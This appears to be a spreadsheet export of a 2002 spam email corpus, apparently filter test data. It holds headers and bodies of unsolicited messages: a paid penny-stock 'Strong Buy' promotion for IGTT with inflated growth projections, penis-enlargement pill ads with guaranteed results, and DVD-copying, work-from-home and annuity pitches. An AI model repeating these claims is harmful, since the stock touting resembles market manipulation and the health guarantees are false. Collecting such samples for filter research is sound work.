    <t>![]([URL]http://www.developerhosting.com[/URL]\n\nVol. 6, Issue 243 - August 2002\n\nThe Wall Street Bulletin\n\n_**Your First Source For News From "The Street"**_\n\nSymbol: **IGTT**  \nShares Outstanding: 373,400,0000  \nFloat (est.): 52,560,000  \nShort-Term Target: $3.75  \n52 week High/Low: $1.10/0.02  \nRating: Strong Buy\n\n**Our last pick Symphony Telecom (OTCBB: SYPY) went UP 100% in just one\nweek!!!**\n\n_InDigiNet Identifies Acquisition Targets with Combined Revenues of $35\nMillion..._\n\n\n\n**Telecom Consolidation Begins to Accelerate**\n\nThe Wall Street Bulletin believes that the recent investment of capital into\nLevel 3, lead by Warren Buffett, is further proof of the continued validity of\nthe telecommunication market when looked at from the perspective of the small\nto mid-sized enterprises. After the boom and bust comes the revival. For some\ncarriers drowning in debt, such as Global Crossing and WorldCom, the future\nmay be dim. But for those survivors of the industry that have managed to\nremain on their feet, other companies' problems mean opportunity. "Every major\nindustry in the history of the United States has experienced a similar\ntransformation, from the railroads in the late 1800s to the automakers in the\nmid-1900s to the Dot-Coms at the end of the 20th century," says Robert\nSaunders, director of the Eastern Management Group market research firm.\nChristopher Dean, CTO of OSS company Eftia, says "We are seeing all the people\nthat are the survivors. There's all this pent-up money and for the surviving\ncarriers out there, they can get what used to cost a few billion for a few\nmillions." _Read the full story from Telecommunications Magazine - See the\nlink at the end of this newsletter._\n\nAs we write this report, our New Recommendation InDigiNet, Inc. (OTCBB: IGTT)\nhas only been trading on the OTC Bulletin Board since late May of 2002. As\nInDigiNet, Inc. continues to implement its business plan, we believe this\ncompany will help lead the way up for the resurgence of the Telecom Sector.\nThis could be our strongest recommendation of the year. We are giving IGTT our\nHighest Rating of STRONG BUY/AGGRESSIVE GROWTH.\n\n\n\n**Ground Floor Opportunity / Tremendous Growth Potential**\n\nWe believe IGTT will perform equally to, if not greater than its competition.\nA similar telecommunications company, Talk America Holdings (Nasdaq: TALK),\nshare price began to explode in April of this year moving from just over\n$0.40/share to over $4.00/share in late June. Talk America Holdings previously\nhad a market cap of only $24.51 million, but today has a market cap of $267\nmillion.\n\nIGTT curently has a market cap of $22.42 million. Using the TALK model for\npotential growth, IGTT could very well be trading in the .60 range in only a\nfew months, with a market cap in excess of $250 million. This would be an\nincrease of 1000%. So you see why IGTT has such great potential and the time\nis right for investors to get in on the ground floor.\n\n\n\n**The _InDigNet_ Strategy**\n\nInDigiNet, Inc. is an integrated solutions company that provides small to mid-\nsized enterprises (SMEs) with an integrated communication solution. InDigiNet\nis a prestigious "Diamond" level partner of Avaya, as well as a reseller for\nCisco and Compaq. The Company will offer data, local, long distance and\nwireless services to SMEs over third party networks enabling the Company to\noffer a comprehensive suite of services without the capital burden of building\na communication network. The Company's strategy is to acquire the customer\nbases of smaller, single market communication companies and attractively\npriced Internet Service Providers (ISPs). _The Company recently completed its\nacquisitions of Fox Telecommunications and WBConnect_. InDigiNet will then\nexpand the breadth of their services to grow revenue and enhance\nprofitability. SMEs account for $120 billion in commercial telephony, data\nservices and technology spending, or 33% of the country's total market, and\nthis spending is expected to grow at above average rates over the next ten\nyears. _Source: Morgan Stanley Dean Witter_.\n\nThe IGTT web site: [URL]www.indiginet.com[/URL]\n\n\n\n**The __ IT Market**\n\nBased on recent studies, the country's 7.4 million SMEs currently lag\nsignificantly in the utilization of IT and data communications, including\nInternet access, web services, business software and e-commerce. Worldwide IT\nspending increased to $981 billion US for the year, an overall increase of 3.7\npercent over 2001, according to a study released 7/24/2002 by market\nresearcher IDC. IT spending in 2003 is expected to reach record heights,\ngrowing by 9 percent worldwide to top the $1 trillion mark for the first time.\nIn IDC's revised forecasts for IT spending in 2002 and 2003, IT spending in\nthe US is expected to increase by 3 percent this year over 2001 to $436\nbillion, with further growth of 9 percent in 2003. Western Europe can expect\ngrowth of 4 percent in 2002 and 6 percent in 2003. Though Japan will\nexperience flat growth levels this year, by next year growth in the market\nwill return to the tune of 7 percent with particular strength shown in China,\nIndia, Korea, Russia, the Philippines, South Africa and Poland. _Source:IDC_\n\n\n\n**Particulars**\n\nThe Wall Street Bulletin is putting IGTT on our Strong Buy/Aggressive Growth\nrecommendation list for the following reasons:\n\n1\. The Company's strategy is to acquire the customer bases of smaller,\nsingle-market communication companies and attractively priced Internet Service\nProviders (ISPs). The Company will sell its bundled service package to the\nacquired customer base that will form a direct and immediate distribution\nchannel for all types of communication services - local, long distance,\nwireless, and data.\n\n  \n2\. The Company is currently serving many customers in the Denver/Front Range\ncommunities but in particular the education vertical market has recognized the\nvalue of integrating a wireless broadband data network into the existing\ncampus network. The Company's customers include United States Olympic\nCommittee (USOC), University of Denver, and Colorado State University.\n\n  \n3\. The Company has identified approximately $35,000,000 in revenues to\nacquire comprised of distressed assets to be auctioned in bankruptcy court and\nsmaller communication providers with valuable customer bases. Each of the\ntargeted companies are within the Company's footprint and will, subject to\npurchase completion, increase the Company's embedded customer base.\n\n\n\n**Investment Consideration**\n\nInDigiNet Inc recently filed its 10QSB, for the three months ended March 31,\n2002. IGTT reported Revenues of $339,694 in Q1 2002 vs. Revenues of $0 in Q1\n2001. At this current growth rate, revenues should grow above $1.3 million for\ntheir first year of production with no increases in acquisitions. As more and\nmore large corporations come under government scrutiny, investors will turn to\nsmall to mid-sized companies with their investment dollars.\n\n\n\nNEWS - InDigiNet, Inc. Completes Acquisition of Fox Telecommunications, Inc. -\n_PRNewswire -_CLICK HERE\n\nNEWS - InDigiNet, Inc. Completes Acquisition of WBConnect _\- PRNewswire_ \-\nCLICK HERE\n\n\n\nNEWS - Telecom Consolidation Begins to Accelerate \- from _Telecommunications\nMagazin_ e - CLICK HERE\n\n\n\nIndustry Interests - Telecommunications Websites: TIA Online \-\nTelecommunications Magazine \- IT World\n\n\n\n**The Wall Street Bulletin is an independent newsletter and is not affiliated\nwith InDigiNet, Inc.**\n\n\n\nThe Wall Street Bulletin is an independent research firm. This report is based\non The Wall Street Bulletin's independent analysis but also relies on\ninformation supplied by sources believed to be reliable. This report may not\nbe the opinion of IGTT management. The Wall Street Bulletin has also been\nretained to research and issue reports on IGTT and was paid ten thousand\ndollars by a shareholder of the company. The Wall Street Bulletin may from\ntime to time buy or sell IGTT common shares in the open market without notice.\nThe information contained in this report is not intended to be, and shall not\nconstitute, an offer to sell or solicitation of any offer to buy any security.\nIt is intended for information only. Some statements may contain so-called\n"forward-looking statements". Many factors could cause actual results to\ndiffer. Investors should consult with their Investment Advisor concerning\nIGTT. Copyright 2002 (C) The Wall Street Bulletin \- All Rights Reserved\n\nI no longer wish to receive your newsletter **CLICK HERE**  \n  \n---  \n  \nikxrkobewgotpevemtbokjgssytdinm\n\n</t>
  </si>
  <si>
    <t>http://www.developerhosting.com www.indiginet.com</t>
  </si>
  <si>
    <t>5613</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Aler &lt;AGNES@btinternet.com&gt;\nDate: Tue, 30 Jul 2002 11:24:05 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 11:24:05 -0500</t>
  </si>
  <si>
    <t>Aler &lt;AGNES@btinternet.com&gt;</t>
  </si>
  <si>
    <t>Telecom Consolidation Begins to Accelerate.................... qsv</t>
  </si>
  <si>
    <t>![]([URL]http://www.developerhosting.com[/URL]  \n  \nVol. 6, Issue 243 - August 2002\n\nThe Wall Street Bulletin\n\n_**Your First Source For News From "The Street"**_\n\nSymbol: **IGTT**  \nShares Outstanding: 373,400,0000  \nFloat (est.): 52,560,000  \nShort-Term Target: $3.75  \n52 week High/Low: $1.10/0.02  \nRating: Strong Buy\n\n**Our last pick Symphony Telecom (OTCBB: SYPY) went UP 100% in just one\nweek!!!**\n\n_InDigiNet Identifies Acquisition Targets with Combined Revenues of $35\nMillion..._\n\n\n\n**Telecom Consolidation Begins to Accelerate**\n\nThe Wall Street Bulletin believes that the recent investment of capital into\nLevel 3, lead by Warren Buffett, is further proof of the continued validity of\nthe telecommunication market when looked at from the perspective of the small\nto mid-sized enterprises. After the boom and bust comes the revival. For some\ncarriers drowning in debt, such as Global Crossing and WorldCom, the future\nmay be dim. But for those survivors of the industry that have managed to\nremain on their feet, other companies' problems mean opportunity. "Every major\nindustry in the history of the United States has experienced a similar\ntransformation, from the railroads in the late 1800s to the automakers in the\nmid-1900s to the Dot-Coms at the end of the 20th century," says Robert\nSaunders, director of the Eastern Management Group market research firm.\nChristopher Dean, CTO of OSS company Eftia, says "We are seeing all the people\nthat are the survivors. There's all this pent-up money and for the surviving\ncarriers out there, they can get what used to cost a few billion for a few\nmillions." _Read the full story from Telecommunications Magazine - See the\nlink at the end of this newsletter._\n\nAs we write this report, our New Recommendation InDigiNet, Inc. (OTCBB: IGTT)\nhas only been trading on the OTC Bulletin Board since late May of 2002. As\nInDigiNet, Inc. continues to implement its business plan, we believe this\ncompany will help lead the way up for the resurgence of the Telecom Sector.\nThis could be our strongest recommendation of the year. We are giving IGTT our\nHighest Rating of STRONG BUY/AGGRESSIVE GROWTH.\n\n\n\n**Ground Floor Opportunity / Tremendous Growth Potential**\n\nWe believe IGTT will perform equally to, if not greater than its competition.\nA similar telecommunications company, Talk America Holdings (Nasdaq: TALK),\nshare price began to explode in April of this year moving from just over\n$0.40/share to over $4.00/share in late June. Talk America Holdings previously\nhad a market cap of only $24.51 million, but today has a market cap of $267\nmillion.\n\nIGTT curently has a market cap of $22.42 million. Using the TALK model for\npotential growth, IGTT could very well be trading in the .60 range in only a\nfew months, with a market cap in excess of $250 million. This would be an\nincrease of 1000%. So you see why IGTT has such great potential and the time\nis right for investors to get in on the ground floor.\n\n\n\n**The _InDigNet_ Strategy**\n\nInDigiNet, Inc. is an integrated solutions company that provides small to mid-\nsized enterprises (SMEs) with an integrated communication solution. InDigiNet\nis a prestigious "Diamond" level partner of Avaya, as well as a reseller for\nCisco and Compaq. The Company will offer data, local, long distance and\nwireless services to SMEs over third party networks enabling the Company to\noffer a comprehensive suite of services without the capital burden of building\na communication network. The Company's strategy is to acquire the customer\nbases of smaller, single market communication companies and attractively\npriced Internet Service Providers (ISPs). _The Company recently completed its\nacquisitions of Fox Telecommunications and WBConnect_. InDigiNet will then\nexpand the breadth of their services to grow revenue and enhance\nprofitability. SMEs account for $120 billion in commercial telephony, data\nservices and technology spending, or 33% of the country's total market, and\nthis spending is expected to grow at above average rates over the next ten\nyears. _Source: Morgan Stanley Dean Witter_.\n\nThe IGTT web site: [URL]www.indiginet.com[/URL]\n\n\n\n**The __ IT Market**\n\nBased on recent studies, the country's 7.4 million SMEs currently lag\nsignificantly in the utilization of IT and data communications, including\nInternet access, web services, business software and e-commerce. Worldwide IT\nspending increased to $981 billion US for the year, an overall increase of 3.7\npercent over 2001, according to a study released 7/24/2002 by market\nresearcher IDC. IT spending in 2003 is expected to reach record heights,\ngrowing by 9 percent worldwide to top the $1 trillion mark for the first time.\nIn IDC's revised forecasts for IT spending in 2002 and 2003, IT spending in\nthe US is expected to increase by 3 percent this year over 2001 to $436\nbillion, with further growth of 9 percent in 2003. Western Europe can expect\ngrowth of 4 percent in 2002 and 6 percent in 2003. Though Japan will\nexperience flat growth levels this year, by next year growth in the market\nwill return to the tune of 7 percent with particular strength shown in China,\nIndia, Korea, Russia, the Philippines, South Africa and Poland. _Source:IDC_\n\n\n\n**Particulars**\n\nThe Wall Street Bulletin is putting IGTT on our Strong Buy/Aggressive Growth\nrecommendation list for the following reasons:\n\n1\. The Company's strategy is to acquire the customer bases of smaller,\nsingle-market communication companies and attractively priced Internet Service\nProviders (ISPs). The Company will sell its bundled service package to the\nacquired customer base that will form a direct and immediate distribution\nchannel for all types of communication services - local, long distance,\nwireless, and data.\n\n  \n2\. The Company is currently serving many customers in the Denver/Front Range\ncommunities but in particular the education vertical market has recognized the\nvalue of integrating a wireless broadband data network into the existing\ncampus network. The Company's customers include United States Olympic\nCommittee (USOC), University of Denver, and Colorado State University.\n\n  \n3\. The Company has identified approximately $35,000,000 in revenues to\nacquire comprised of distressed assets to be auctioned in bankruptcy court and\nsmaller communication providers with valuable customer bases. Each of the\ntargeted companies are within the Company's footprint and will, subject to\npurchase completion, increase the Company's embedded customer base.\n\n\n\n**Investment Consideration**\n\nInDigiNet Inc recently filed its 10QSB, for the three months ended March 31,\n2002. IGTT reported Revenues of $339,694 in Q1 2002 vs. Revenues of $0 in Q1\n2001. At this current growth rate, revenues should grow above $1.3 million for\ntheir first year of production with no increases in acquisitions. As more and\nmore large corporations come under government scrutiny, investors will turn to\nsmall to mid-sized companies with their investment dollars.\n\n\n\nNEWS - InDigiNet, Inc. Completes Acquisition of Fox Telecommunications, Inc. -\n_PRNewswire -_CLICK HERE\n\nNEWS - InDigiNet, Inc. Completes Acquisition of WBConnect _\- PRNewswire_ \-\nCLICK HERE\n\n\n\nNEWS - Telecom Consolidation Begins to Accelerate \- from _Telecommunications\nMagazin_ e - CLICK HERE\n\n\n\nIndustry Interests - Telecommunications Websites: TIA Online \-\nTelecommunications Magazine \- IT World\n\n\n\n**The Wall Street Bulletin is an independent newsletter and is not affiliated\nwith InDigiNet, Inc.**\n\n\n\nThe Wall Street Bulletin is an independent research firm. This report is based\non The Wall Street Bulletin's independent analysis but also relies on\ninformation supplied by sources believed to be reliable. This report may not\nbe the opinion of IGTT management. The Wall Street Bulletin has also been\nretained to research and issue reports on IGTT and was paid ten thousand\ndollars by a shareholder of the company. The Wall Street Bulletin may from\ntime to time buy or sell IGTT common shares in the open market without notice.\nThe information contained in this report is not intended to be, and shall not\nconstitute, an offer to sell or solicitation of any offer to buy any security.\nIt is intended for information only. Some statements may contain so-called\n"forward-looking statements". Many factors could cause actual results to\ndiffer. Investors should consult with their Investment Advisor concerning\nIGTT. Copyright 2002 (C) The Wall Street Bulletin \- All Rights Reserved\n\nI no longer wish to receive your newsletter **CLICK HERE**  \n  \n---  \n  \ntahnorrjilisgoyymddppqw\n\n</t>
  </si>
  <si>
    <t>5615</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: &lt;info@clrea.com&gt;\nDate: Tue, 30 Jul 2002 10:31:12 -0700</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 10:31:12 -0700</t>
  </si>
  <si>
    <t>&lt;info@clrea.com&gt;</t>
  </si>
  <si>
    <t>ADV: buyers sellers agents loans</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: 7bit  	   Home for Sale?  List with us!   Buying a home is an important step in your life and quite possibly the largest purchase you will ever make. A trustworthy and reliable agent is what you're looking for but often times it can be difficult to find a real estate agent deserving of your trust. Through recommendations and client evaluations we've assembled a national association of Christian Real Estate Agents   dedicated to fair business practices and the teachings of our savior. Christian Agents, Lenders, Appraisers and Inspectors: Click Here   to learn more about joining our family of Christian Real Estate Professionals Follow these easy steps   and we'll take care of the rest... 1. Describe the property you are looking using our Buyer's Information Form  . 2. Our Christian Living Real Estate Associate Agent contacts you at your convenience to get a better understanding of your specific real estate needs. 3. Our Christian Living Real Estate Associate Agent suggests properties that fit your criteria and arranges for you to view the properties that interest you. 4. During the decision making process, our Associate Christian Agent provides reliable and honest guidance to get you the best possible deal. 5. When you've decided on a property to purchase, our agent makes all the necessary preparations to ensure a trouble free transaction.    To be removed from this list click here    ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable for home buyers   Home for Sale? List with=20             us! Buying a=20               home is an important step in your life and quite possibly = the=20               largest purchase you will ever make. A trustworthy and = reliable=20               agent is what you're looking for but often times it can be =               difficult to find a real estate agent deserving of your=20               trust. Through=20               recommendations and client evaluations we've assembled a = national=20               association of Christian = Real Estate=20               Agents dedicated to fair business practices and the = teachings=20               of our savior. Christian=20                 Agents, Lenders, Appraisers and Inspectors: Click=20                 Here to learn more about joining our family of = Christian Real=20                 Estate Professionals Follow=20               these easy = steps and=20               we'll take care of the rest... 1. Describe = the property=20               you are looking using our Buyer's = Information=20               Form. 2. Our Christian = Living Real=20               Estate Associate Agent contacts you at your convenience to = get a=20               better understanding of your specific real estate=20 needs. 3. Our Christian = Living Real=20               Estate Associate Agent suggests properties that fit your = criteria=20               and arranges for you to view the properties that interest=20               you. 4. During the decision = making=20               process, our Associate Christian Agent provides reliable = and=20               honest guidance to get you the best possible = deal. 5. When you've decided = on a=20               property to purchase, our agent makes all the necessary=20               preparations to ensure a trouble free = transaction.To be removed from this list click=20         here = ------=_NextPart_000_1B9FC_01C237B4.3A3BBE30-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5606</t>
  </si>
  <si>
    <t>To: hulkjr@msn.com\nFrom: "Suzie White" &lt;users002@roklink.ro&gt;\nDate: Tue, 30 Jul 2002 06:04:16 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 06:04:16 -0500</t>
  </si>
  <si>
    <t>"Suzie White" &lt;users002@roklink.ro&gt;</t>
  </si>
  <si>
    <t>hulkjr@msn.com</t>
  </si>
  <si>
    <t>Computer File Protection</t>
  </si>
  <si>
    <t>Dear hulkjr ,\n\nWANT THE BEST IN COMPUTER FILE SECURITY?\n\n\nIn today's society of computer hacking, identity theft and general snooping, it is \nmore important than ever to take precautions to protect your privacy.  The Internet \nis by far the preferred manner of communication in today's fast paced world.  It does, \nhowever, present privacy concerns when communicating personal or confidential \ninformation.  It also provides computer hackers an extensive playground, with your \nidentity and financial information as the grand prize.\n\nLock &amp; Key Encrypter is the perfect solution to these privacy concerns.  This affordable, \neasy to use software encrypts your computer files for safe storage or transmittal \nover the Internet. \n\nDon't Become A Victim.  Protect your privacy and your financial well being.  \nOrder Today! This is a Limited Time Offer at this amazing low price $19.99\n\nVisit our SECURE website for an in-depth look at this product:\n[URL]http://www299.fastwebsnet.com[/URL]\n\n\n\nTo be eliminated from future marketing:\n[URL]http://www299.fastwebsnet.com[/URL]\n\n\n \n\n [E^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs]</t>
  </si>
  <si>
    <t>http://www299.fastwebsnet.com http://www299.fastwebsnet.com</t>
  </si>
  <si>
    <t>5605</t>
  </si>
  <si>
    <t>To: paolo@virgilio.it\nFrom: &lt;matty@hurra.de&gt;\nDate: Tue, 30 Jul 2002 04:26:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 04:26:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>&lt;matty@hurra.de&gt;</t>
  </si>
  <si>
    <t>paolo@virgilio.it</t>
  </si>
  <si>
    <t>STAY HOME AND EARN MONEY</t>
  </si>
  <si>
    <t>Do you want to make money from home?  Are you tired\nof working for someone else? Then welcome to the \nfuture.  \n\n[URL]http://www.lotsonet.com[/URL]\n\n\nDue to our overwhelming growth of nearly 1,000% \nover the last three years, we have an immediate \nneed and are willing to train and develop even \nnon-experienced individuals in local markets.\n\n[URL]http://www.lotsonet.com[/URL]\n\nWe are a 14 year old Inc 500 company.  Are you \nwilling to grow?  Are you ready to take on the\nchallenges of the future?  Than we want you!\n\nSimply click on the link below for free information!\nNo obligation whatsoever.\n\n[URL]http://www.lotsonet.com[/URL]\n\n \n\nTo be removed from this list go to:\n\n[URL]www.lotsonet.com[/URL]\n\n\n\n\n\n\n6725ppxR2-400ZydL68l18</t>
  </si>
  <si>
    <t>http://www.lotsonet.com http://www.lotsonet.com http://www.lotsonet.com www.lotsonet.com</t>
  </si>
  <si>
    <t>5603</t>
  </si>
  <si>
    <t>To: remi@a2zis.com, yyyy-fm@spamassassin.taint.org, nick@fargus.net,\nFrom: mike@winners.com ()\nDate: Tue, 30 Jul 2002 03:48:23 -0400</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 03:48:23 -0400</t>
  </si>
  <si>
    <t>mike@winners.com ()</t>
  </si>
  <si>
    <t>remi@a2zis.com, yyyy-fm@spamassassin.taint.org, nick@fargus.net,</t>
  </si>
  <si>
    <t>GET OVER $500 CASH in 2 minutes!!!</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by  (mike@winners.com) on Tuesday, July 30, 19102 at 03:48:23\n---------------------------------------------------------------------------\n\nmessage: GET OVER $500 DOLLARS CASH!!! Just Click Here!!!! - [URL]http://www.reelten.com[/URL] -     If you have received this Email in error please contact: lon_chaney_jr@hotmail.com with subject: remove. \n\n---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://www.reelten.com</t>
  </si>
  <si>
    <t>5601</t>
  </si>
  <si>
    <t>To: forgione@starpower.net, foriqua@yahoo.com, fork@porktornado.com,\nFrom: xcutieamandax@yahoo.com ()\nDate: Tue, 30 Jul 2002 03:04:36 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 03:04:36 -0400 (EDT)</t>
  </si>
  <si>
    <t>xcutieamandax@yahoo.com ()</t>
  </si>
  <si>
    <t>forgione@starpower.net, foriqua@yahoo.com, fork@porktornado.com,</t>
  </si>
  <si>
    <t>Penis Enlargement Pills - 100% Guarantee Or Money Back</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by  (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 03:04:36 --------------------------------------------------------------------------- : "Want a BIG Penis?" Experience the results you've always wanted with a massive scientific breakthrough:Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge Your Penis. 100% GUARANTEED! Best of all, There Are NO Agonizing Hanging Weights, NO Tough Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO Dangerous Surgery Involved. We Guarantee genuine lasting results! Vig-Rx pills will work for you 100%, or you will get 100% of your money back!Click here to give it a try"This is one of the best investments I have ever made. I can not even begin to express how much gratitude I have for this product. I am not even through with my first bottle and have already grown 1 in. in length and just over 1 in. in girth, and I still have another bottle to go! No more am I the average 6 inch guy --------------------------------------------------------------------------- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5597</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netnoteinc.com&gt;\nFrom: "Alistair Hill" &lt;ali@microfinder.com&gt;\nDate: Tue, 30 Jul 2002 01:33:04 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 01:33:04 +0100</t>
  </si>
  <si>
    <t>"Alistair Hill" &lt;ali@microfinder.com&gt;</t>
  </si>
  <si>
    <t>Amazing Trade Computer Deals</t>
  </si>
  <si>
    <t>Please take time to look at our newly designed website : [URL]www.microfinder.com[/URL]\n\nWe have a full range of Notebooks, Desktops and Accessories displayed on\nthe site.\n\nIf you are looking for trade prices feel free to subscribe to the trade\nsection.\n\nHere are some of our latest specials :\n\nNotebooks :\n\n8 x Famous Brand A430, PIII650mhz, 128MB RAM, 6GB HDD, 13.3" TFT Screen,\n56K Modem,\nCD Rom, FDD, USB\n1 @ 525 + vat, 5 @ 495\n\n5 x Dell CPX H500GT, PIII500mhz, 128MB, 12GB HDD, 14.1" TFT, CDRom, FDD, USB\n1 @ 480 + vat, 5 @ 455 + vat\nDELL CDRW Available 75 extra\n\n10 x IBM Thinkpad 380 XD, P233mmx, 32MB, 4GB, 12.1" TFT, CDRom, FDD, USB,\n(New Battery!)\n1 @ 325 + vat, 5 @ 299 + vat\n\n10 x Digital Hi Note VP 735, P233mmx, 64MB, 3GB HDD, 13.3" TFT, CDRom,\nFDD, USB\n(Free Carry Case)\n1 @ 300 + vat, 5 @ 275 + vat\n\n20 x Low End Notebooks, P133, 32MB, 1.5GB, TFT and Dual Scan, FDD\n&gt;&gt;From 125 + vat\n\nDesktops :\n\n20 x Packard Bell Imedia 4600, Celeron 850mhz, 128MB Ram, 20GB HDD, DVD\nRom, FDD, USB\n12 Months Warranty\n1 @ 320+vat, 5 @ 299 + vat\n\nOther Imedias in stock - call for prices \n\n30 x Packard Bell Aur@, TFT Screen and Slim line Base Unit Designer PC,\nPIII933mhz, 128 MB Ram, 30GB HDD, DVD, CDRW, PCMCIA, USB, 15" TFT Screen\n5 @ 550 + vat\n\nCall Ali or Tris\nSales and Marketing\nMicrofinder UK Ltd. \nTel : 01225 447227\nFax : 01225 471166\n106 Walcot St\nBath\nBA1 5BG\n\nTo be removed from this e-mail shot, please reply stating remove in the\nsubject field.</t>
  </si>
  <si>
    <t>www.microfinder.com</t>
  </si>
  <si>
    <t>5600</t>
  </si>
  <si>
    <t>To: foo-faq@foo-ag.de, FOREGONE@MSN.COM, forgione@starpower.net,\nFrom: xcutieamandax@yahoo.com ()\nDate: Tue, 30 Jul 2002 01:29:47 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 01:29:47 -0500</t>
  </si>
  <si>
    <t>foo-faq@foo-ag.de, FOREGONE@MSN.COM, forgione@starpower.net,</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by  (xcutieamandax@yahoo.com) on Tuesday, July 30, 2002 at 01:29:47 --------------------------------------------------------------------------- : "Want a BIG Penis?" Experience the results you've always wanted with a massive scientific breakthrough:Our Doctor-Approved Pill Will Actually Expand, Lengthen And Enlarge Your Penis. 100% GUARANTEED! Best of all, There Are NO Agonizing Hanging Weights, NO Tough Exercises, NO Painful And Hard-To-Use Pumps, And There Is NO Dangerous Surgery Involved. We Guarantee genuine lasting results! Vig-Rx pills will work for you 100%, or you will get 100% of your money back!Click here to give it a try"This is one of the best investments I have ever made. I can not even begin to express how much gratitude I have for this product. I am not even through with my first bottle and have already grown 1 in. in length and just over 1 in. in girth, and I still have another bottle to go! No!  more am I the average 6 inch guy. THANK YOU SO MUCH " Ben, IdahoTo be removed from the opt-in list click here --------------------------------------------------------------------------- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5608</t>
  </si>
  <si>
    <t>To: &lt;webmaster@efi.ie&gt;\nFrom: &lt;0147j10@mileniumnet.com.br&gt;\nDate: Tue, 30 Jul 0102 07:06:00 -0600</t>
  </si>
  <si>
    <t>Tue, 30 Jul 0102 07:06:00 -0600</t>
  </si>
  <si>
    <t>&lt;0147j10@mileniumnet.com.br&gt;</t>
  </si>
  <si>
    <t>This product appeals to all DVD lovers 9959GLXz3-738HFdN8831kbee5--25</t>
  </si>
  <si>
    <t>Copy DVD Movies?\n\nYes!  Copy and burn your own DVD\nmovies and video with a CD-R Drive.\n\n* All Software Included On CD\n* Step by Step Instructions\n* No DVD Burner Required\n* We ship all orders within 72 hours!\n* 30 Day "NO Risk Trial".\n\nSo don't delay...get your copy TODAY!\n\n[URL]http://209.163.187.46[/URL]\n+++++++++++++++++++++++++++++++++++++++++++\nTo "Opt-Out"\n\n[URL]http://209.163.187.46[/URL]\n5275MPdA5-850BRBf9054xgTa4-379luJl31</t>
  </si>
  <si>
    <t>http://209.163.187.46 http://209.163.187.46</t>
  </si>
  <si>
    <t>4286</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - PMG" &lt;pmg@insiq.us&gt;\nDate: Tue, 3 Sep 2002 19:20:07 -0400</t>
  </si>
  <si>
    <t>Tue, 3 Sep 2002 19:20:07 -0400</t>
  </si>
  <si>
    <t>"IQ - PMG" &lt;pmg@insiq.us&gt;</t>
  </si>
  <si>
    <t>We Dare You to Find a Better Annuity</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1CDC19_01C25366.4B57F3A0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  We dare you...  Try to find a better annuity! =20   - 5.40% Guaranteed for 6 Years=0A= - 6 Year Surrender Charge=0A= - 5% Agent Commission up to age 80=09 Call today for more information!  800-888-7641 ext. 103 - or - Please fill out the form below for more information	=20 Name:	 	  =09 E-mail:	 	=20 Phone:	 	=20 City:	 	 State:	 	=20  	    =09 =20  PMG Financial Services *5.40% for deposits of $100,000 and up, 5.25% interest for deposits totalling $25,000-$99,999.	=20 We don't want anyone to receive our mailings who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insuranceiq.com[/URL] =20 Legal Notice =20 ------=_NextPart_000_1CDC19_01C25366.4B57F3A0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We Dare You to Find a Better Annuity =20 =20      =20        =20            =20            Call today for more information!             - or - =20                  =20                      =20                         Please fill out the form below for more = information =20                         Name: =20                         E-mail: =20                         Phone: =20                         City: State: =20                           =20                            =20              =20           *5.40% for deposits of $100,000 and up, = 5.25% interest for deposits totalling $25,000-$99,999. =20      We=20 			don't want anyone to receive our mailings who does not=20 			wish to receive them. This is a professional communication=20 			sent to insurance professionals. To be removed from this mailing=20 			list, DO NOT REPLY to this message. Instead, go here: =20 			[URL]http://www.insuranceiq.com[/URL] Legal Notice =20 ------=_NextPart_000_1CDC19_01C25366.4B57F3A0--</t>
  </si>
  <si>
    <t>5805</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - TBA" &lt;tba@insiq.us&gt;\nDate: Tue, 3 Dec 2002 18:52:29 -0500</t>
  </si>
  <si>
    <t>Tue, 3 Dec 2002 18:52:29 -0500</t>
  </si>
  <si>
    <t>"IQ - TBA" &lt;tba@insiq.us&gt;</t>
  </si>
  <si>
    <t>Preferred Non-Smoker Rates for Smokers</t>
  </si>
  <si>
